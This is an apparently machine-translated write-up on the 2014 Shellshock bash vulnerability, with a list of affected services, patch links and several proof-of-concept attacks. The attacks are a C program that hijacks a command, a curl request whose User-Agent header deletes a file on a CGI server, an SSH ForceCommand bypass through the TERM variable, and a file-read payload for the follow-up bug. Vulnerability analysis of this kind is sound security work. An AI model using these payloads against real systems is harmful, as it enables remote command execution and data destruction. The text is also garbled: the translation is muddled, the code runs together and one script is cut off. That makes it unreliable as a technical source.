CVE-2014-6271 Data Summary

CVE-2014-6271 Data Summary

Author: shawn

0x00 what is BASH

Bourne Again Shell (BASH) is the most popular SHELL implementation on GNU/Linux. It was born in 1980, after decades of evolution, a simple terminal command line interpreter has evolved into a multi-functional interface deeply integrated with the GNU system.

0x01 CVE-2014-6271

Stéphane Chazelas, a French GNU/Linux enthusiast, discovered a famous SHELL in middle September 2014) vulnerability. You can execute the script code you want to execute by constructing the environment variable value, according to reports, this vulnerability affects many applications running on GNU/Linux that interact with BASH, including:

 

In sshd configuration, ForceCommand is used to restrict remote users from executing commands. This vulnerability can bypass the restriction to execute any commands. Some restrictions on the deployment environment of Git and Subversion Shell will also be similar, OpenSSH is usually used normally no problem.

The Apache server uses mod_cgi or mod_cgid. If the CGI script is in BASH or runs in a sub-SHELL, it will be affected. Use C's system/popen in the sub-Shell, and OS in Python. system/OS. this vulnerability affects the use of open/system in popen, PHP in system/exec (CGI Mode), and Perl.

PHP script execution in mod_php will not be affected. DHCP clients can exploit this vulnerability to call shell scripts to receive environment variable parameter values of remote malicious servers.

The daemon and SUID programs may also be affected to execute SHELL scripts in the environment where environment variables are set.

Any other program that executes SHELL scripts using BASH as the interpreter may be affected. If the Shell script is not exported, it will not be affected.

OpenSSH, Apache2, php, dhcp client, and even programs with SUID.

1. Check whether vulnerabilities exist in the local SHELL environment:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If the vulnerability exists, "vulnerable" is printed ".

2, C program:

-----------------------------------------------------------------------------/* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */#include <unistd.h>#include <stdio.h> int main(){    char *envp[] = {        "PATH=/bin:/usr/bin",        "/usr/bin/id=() { "        "echo pwn me twice, shame on me; }; "        "echo pwn me once, shame on you",        NULL    };    char *argv[] = { "/bin/bash", NULL };     execve(argv[0], argv, envp);    perror("execve");    return 1;}

Test:

je@tiny:~$ gcc -o bash-is-fun bash-is-fun.cje@tiny:~$ ./bash-is-funpwn me once, shame on youje@tiny:/home/je$ /usr/bin/idpwn me twice, shame on me

In this POC, we can see that BASH does not end with processing at all. Later we can see why through patches.

3. Test the HTTP environment on INVISIBLETHREAT:

Create a script named poc. cgi:

#!/bin/bash echo "Content-type: text/html"echo "" echo '
Put the script on the test machine and enter:
$ curl http://192.168.0.1/poc.cgi 
Try setting a user-agent Using curl again:
$ curl -A "() { :; }; /bin/rm /var/www/target" http://192.168.0.1/poc.cgi <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
The/var/www/target has been deleted. Let's take a look:
$ curl http://192.168.0.1/target <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
In this example, the content is passed into HTTP_USER_AGENT (CGI will parse the HTTP header as an environment variable). The final result is as follows:
HTTP_USER_AGENT() {    :;};/bin/rm /var/www/target
Only the definition of the function should be parsed, but the subsequent content is still executed.
 
4. POC for OpenSSH
Currently, there are two attack planes. Solar Designer provides the local usage of SSH_ORIGINAL_COMMAND:
Seclists.org/oss-sec/2014/q3/651
There is also the POC for remote exploitation by using the TERM:
Generate an RSA key pair on machine:
 
shawn@debian-test32:~/.ssh$ ssh-keygen Generating public/private rsa key pair.Enter file in which to save the key (/home/shawn/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/shawn/.ssh/id_rsa.Your public key has been saved in /home/shawn/.ssh/id_rsa.pub.The key fingerprint is:09:1c:92:fb:c5:68:f8:e1:b9:c2:62:a8:c7:75:5b:dc shawn@debian-test32The key's randomart image is:+--[ RSA 2048]----+|    ...          ||    .o .         ||     ooo         ||    o +.o.       ||     = =S.       ||    . * o E      || o o . +         ||. = o o          ||oo . .           |+-----------------+


Copy the public key of A to machine B:
 
$cat /home/shawn/.ssh/authorized_keyscommand="/tmp/ssh.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9xYHEdjbbvSO+RAtDS3u+R4sD87SUQq5OZJ+6P5n3BoOz8eKfmK2B4qQa28uGvpseFSSXIoXTKdeS3mCXevbibGG6E3RQ63U7USrh9iQupO6c45Qt+3/WOo7X3mRlZ1awUmCjurcA5Zm/yOvyMJCoRd1kpkiJljgHtMztEhWvAE4inFkqyWC81SSfsvNd/GEiyCpFw84UTdF/cH626V3V73hlxwBMd8UKI27I7ATMOcPgWsI5738tLpgPDSisvZZXZNlxAfvSgpxKYAHOQ9VsaJCG4q+Giob5iX4IDzn8gs8G7uGW+EGhzTMq83f/8ar5a5Ex8Dg9M/loYPIPp5gJ shawn@debian-test32


A script used to control command/SSH_ORIGINAL_COMMAND
 
shawn@linux-ionf:~/.ssh> cat /tmp/ssh.sh#!/bin/sh case "$SSH_ORIGINAL_COMMAND" in    "ps")        ps -ef        ;;    "vmstat")        vmstat 1 100        ;;    "cups stop")        /etc/init.d/cupsys stop        ;;    "cups start")        /etc/init.d/cupsys start        ;;    *)        echo "Sorry. Only these commands are available to you:"        echo "ps, vmstat, cupsys stop, cupsys start"        #exit 1        ;;esac


The restriction script can be used normally on machine:
 
shawn@debian-test32:~/.ssh$ export SSH_ORIGINAL_COMMAND="ps"shawn@debian-test32:~/.ssh$ ssh  shawn@192.168.115.129 $SSH_ORIGINAL_COMMANDEnter passphrase for key '/home/shawn/.ssh/id_rsa': UID        PID  PPID  C STIME TTY          TIME CMDroot         1     0  0 16:47 ?        00:00:02 /sbin/init showoptsroot         2     0  0 16:47 ?        00:00:00 [kthreadd]root         3     2  0 16:47 ?        00:00:00 [ksoftirqd/0]
Use the TERM:
 
shawn@debian-test32:~$ export TERM='() { :;}; id'; ssh  shawn@192.168.115.129Enter passphrase for key '/home/shawn/.ssh/id_rsa': uid=1000(shawn) gid=100(users) groups=100(users)Connection to 192.168.115.129 closed.
0x02 patch and follow-up

Patches received from the earliest GNU/Linux release community:
Https://bugzilla.novell.com/attachment.cgi? Id = 606672
We can see that BASH does not handle exceptions, but it is executed after direct parsing.
The official Community patch is here:
Http://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017 http://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018 http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052 http://ftp.gnu.org/pub/gnu/bash/bash-4.0-patches/bash40-039 http://ftp.gnu.org/pub/gnu/bash/bash-4.1-patches/bash41-012 http://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-048
But because of the incomplete patch repair, resulting in the CVE-2014-7169 burst, POC is as follows:
shawn@shawn-fortress /tmp $ date -u > test_fileshawn@shawn-fortress /tmp $ env X='() { (a)=<\' bash -c 'test_file cat'bash: X: line 1: syntax error near unexpected token `='bash: X: line 1: `'bash: error importing function definition for `X'Thu Sep 25 09:37:04 UTC 2014
This POC allows attackers to read files. It seems that the subsequent story is not over ...................
[1] BASH [2] Bash specially-crafted environment variables code injection attack [3] CVE-2014-6271 [4] CVE-2014-7169 [5] CVE-2014-6271: remote code execution through bash